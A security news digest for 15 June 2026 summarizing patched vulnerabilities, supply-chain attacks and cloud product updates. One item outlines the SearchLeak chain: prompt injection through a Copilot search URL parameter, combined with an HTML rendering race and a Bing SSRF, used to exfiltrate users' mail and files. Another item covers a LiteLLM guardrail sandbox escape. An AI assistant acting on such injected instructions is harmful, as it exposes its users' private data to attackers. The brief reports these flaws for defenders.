Zero‑Days Patched, Private AWS Console, and Supply‑Chain Hits
Coverage: 15 Jun 2026 (UTC)
< view all daily briefs >Patch and mitigation actions led the day, with fixes for an actively exploited Cisco SD‑WAN zero‑day, a chained takeover risk in LiteLLM, and a one‑click exfiltration path in Microsoft 365 Copilot. Attack activity also surfaced across research and web ecosystems, while cloud providers rolled out private console access, integrated DNS threat defenses, and new operations tooling. The updates emphasize rapid remediation, tighter identity and network boundaries, and improved visibility across multi‑account environments.
Patch and Mitigation Alerts
Cisco vManage received a critical fix for CVE-2026-20262 after active exploitation was detected. The flaw, in the Catalyst SD‑WAN Manager web UI file upload handling, allowed an authenticated low‑privilege attacker to craft HTTP requests that create or overwrite files and ultimately escalate to root across on‑premises, Cloud‑Pro, Cisco‑managed cloud, and FedRAMP deployments. Cisco published first fixed releases, indicators of compromise, and log paths (including vmanage‑server, vmanage‑appserver, and serviceproxy‑access) to check for attempts to upload index.jsp and .war files. Administrators are advised to update immediately and review logs for signs of privilege escalation and persistence.
Obsidian detailed a chained exploitation of LiteLLM that enables a low‑privilege internal_user to escalate to proxy admin and execute server‑side code, yielding full takeover. The chain spans CVE‑2026‑47101 (authorization bypass via unchecked allowed_routes), CVE‑2026‑47102 (unchecked writes to user_role), and CVE‑2026‑40217 (sandbox escape in Custom Code Guardrail), with a combined CVSS 9.9. Attackers could recover master and salt keys, database URLs, all configured provider keys, and read all proxied prompts and responses; callbacks could even rewrite model outputs. BerriAI fixed the issues in v1.83.14‑stable (May 2). Recommended actions include upgrading, auditing proxy_admin accounts, reviewing and hardening Custom Code Guardrails and callbacks, and rotating any exposed credentials and tokens.
Varonis disclosed SearchLeak (CVE‑2026‑42824), a chain that enabled one‑click exfiltration from Microsoft 365 Copilot Enterprise by combining a parameter‑to‑prompt injection in the Copilot Search q parameter, a rendering race that allowed raw HTML to run momentarily, and an SSRF in Bing’s “Search by Image” to bypass CSP and proxy outbound data. An attacker‑crafted link could cause Bing to fetch attacker‑controlled URLs server‑side, siphoning emails, files, calendar items, and time‑sensitive codes accessible via Microsoft Graph. Microsoft issued backend mitigations; organizations should ensure service updates are applied and monitor for Copilot search URLs with encoded HTML and unusual requests to Bing image endpoints.
A critical SimpleHelp vulnerability (CVE‑2026‑48558) lets unauthenticated attackers create privileged Technician accounts on servers using OpenID Connect when group‑authenticated logins are enabled. The flaw bypasses MFA by abusing insufficient validation of identity assertions. Patched in 5.5.16 and 6.0RC2, the issue can enable remote access to managed endpoints and script execution. Where upgrades are delayed, administrators should restrict technician login sources via IP allowlists and monitor for unexpected technician registrations, unfamiliar email addresses, and related log entries, while planning prompt remediation.
Intrusions and Supply‑Chain Compromises
Sansec reported a supply‑chain attack that injected malicious JavaScript into three Awesome Motive plugins—PushEngage, OptinMonster, and TrustPulse—affecting downstream sites that loaded the altered files. The WordPress plugins payload activated only for logged‑in administrators, created a rogue admin, installed a stealth backdoor plugin, and exfiltrated credentials to a fake tidio[.]cc domain. Exposure windows varied across June 12–13; reach does not equal confirmed compromise. Recommended actions include assuming compromise if affected scripts were loaded, conducting full server‑side forensics, hunting for stealth folders and unexpected admin accounts, reviewing logs for connections to the listed domains and IPs, and rotating credentials and salts to remove persistence.
Google Threat Intelligence Group documented a long‑running espionage operation by a China‑linked cluster (UNC6508) that targeted exposed REDCap instances at a North American medical research institution. The REDCap breach used a bespoke Infinitered malware suite, credential harvesting via trojanized login pages, and a backdoor controlled through HTTP cookies to execute commands, transfer files, and query databases. Attackers also abused cloud email “content compliance rules” to auto‑BCC matched documents to an external Gmail account for covert exfiltration. GTIG shared YARA rules and IoCs and recommended updating REDCap, removing legacy deployments, enabling MFA/2SV and device‑bound session credentials, and scanning for Infinitered indicators.
Palo Alto Networks reported limited in‑the‑wild exploitation of CVE‑2026‑0257, an authentication bypass affecting GlobalProtect portal and gateway components in PAN‑OS. The GlobalProtect flaw can allow unauthenticated actors to establish VPN sessions. The vendor published indicators and client configuration values for defenders to search and noted that CISA added the issue to the KEV catalog with a federal remediation deadline. Organizations should apply available mitigations and review gateway connection logs for matches to the provided IoCs.
AWS: Private Access, DNS Protections, and Resilience
AWS introduced Console Private Access, enabling access to the AWS Management Console from VPCs without internet connectivity by using AWS PrivateLink and VPC endpoints. Administrators can apply endpoint policies to limit reachable accounts and organizations and continue enforcing IAM, Service Control, and Resource Control policies. Available across commercial Regions and billed via endpoint usage and data processing, this approach reduces the attack surface for console access and helps meet network‑isolation requirements in regulated and highly controlled environments.
In preview, AWS integrated Palo Alto Networks Advanced DNS Security with Route 53 Firewall, allowing administrators to subscribe via an embedded Marketplace widget and apply threat categories such as C2, Malware, Phishing, Newly Registered Domains, and more. The integration brings fast‑flux protection, DNS tunneling and rebinding safeguards, and DGA detection to DNS queries from VPCs and hybrid environments routed through Resolver Endpoints. It supports centralized governance across accounts via RAM, Route 53 Profiles, and Firewall Manager, with findings in Security Hub and logs exportable to S3, Firehose, or CloudWatch. PANW rule additions incur no extra DNS Firewall charge, and the Marketplace subscription is free during preview.
For data resilience and distribution, AWS enabled on‑demand cross‑Region replication for FSx OpenZFS across both default and opt‑in Regions. Customers can transfer incremental point‑in‑time snapshots to expand disaster recovery patterns, cross‑account movement, and lower‑latency access for distributed users. AWS notes no additional FSx charge specific to on‑demand replication, though standard inter‑Region or cross‑account data transfer fees apply; management is available through the FSx console and documentation.
Observability and operations also advanced. CloudWatch Query Studio is generally available, offering a unified console workspace to run PromQL and Metrics Insights queries across AWS‑vended and OpenTelemetry metrics with cross‑account and cross‑Region selectors, visualization options, and dashboard integration (not available in UAE, Bahrain, and Israel/Tel Aviv). In parallel, the DevOps Agent added custom SRE agents, bring‑your‑own sub‑agents, and headless access via MCP and A2A. Teams can schedule recurring jobs, integrate with existing tools and coding assistants, extend capabilities via Bedrock or third‑party frameworks, and monitor task quality with new dashboards, expanding automation for SRE workflows.
GovCloud, AI Agents, and Security Practice
ECS Express Mode is now available in AWS GovCloud (US‑East and US‑West). It automates common operational tasks for containerized apps while preserving full customer control, supports public or private HTTPS endpoints with an AWS‑provided domain, scales with traffic, and can consolidate up to 25 services behind a single ALB using rule‑based routing. Resources remain in the customer’s account and the feature carries no extra charge beyond underlying AWS usage, supporting rapid deployments in controlled environments.
Google introduced a broad set of Google agents and developer tools across its Agentic Data Cloud, bringing conversational analytics to BigQuery Studio and lakehouse environments and adding agents for data engineering (GA), data science (preview), database observability (preview), dashboards (preview), and cross‑source insights and deep research (previews). Developer offerings include a Data Agent Kit (preview), Managed MCP Servers (GA/preview), an MCP Toolbox 1.0 (GA), and QueryData (preview) for high‑accuracy natural‑language‑to‑SQL. The announcement emphasizes grounding in enterprise context, unified governance, and improved access controls to reduce AI‑related risks.
Sharing operational lessons, Google Cloud’s CISO outlined four pillars—Prepare, Scan and Prioritize, Remediate, and Monitor—in CISO Perspectives. The approach describes reducing attack surface, AI‑assisted large‑scale scanning and prioritization by reachability and blast radius, centralized tracking with risk‑based rollout and autonomous patching with human review, and continuous monitoring with feedback loops and automated containment. The blueprint highlights measured adoption of AI to accelerate finding and fixing vulnerabilities while maintaining safety through context‑aware models and robust rollbacks.